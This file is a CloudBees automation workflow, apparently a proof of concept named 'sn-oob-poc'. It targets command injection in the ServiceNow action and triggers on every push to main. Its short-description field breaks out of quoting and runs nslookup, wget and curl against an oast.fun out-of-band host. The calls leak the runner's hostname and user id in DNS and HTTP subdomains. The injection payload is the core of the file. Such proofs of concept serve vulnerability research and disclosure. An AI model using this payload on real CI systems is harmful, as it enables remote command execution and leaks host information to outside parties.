apiVersion: automation.cloudbees.io/v1alpha1
kind: workflow
name: sn-oob-poc
on:
  push: { branches: [ main ] }
  workflow_dispatch: {}
jobs:
  poc:
    steps:
      - uses: cloudbees-io/servicenow@v1
        with:
          action-type: 'create_change'
          url: 'https://example.service-now.com'
          username: 'u'
          password: 'p'
          short-description: "x' & nslookup h1-$(hostname 2>/dev/null || echo nohn).d9d252kjor348hmd7030i8xjpcatjjjd6.oast.fun || wget -qO- http://h2-$(id -u 2>/dev/null || echo noid).d9d252kjor348hmd7030i8xjpcatjjjd6.oast.fun/ || curl -s http://h3.d9d252kjor348hmd7030i8xjpcatjjjd6.oast.fun/ || : ;"
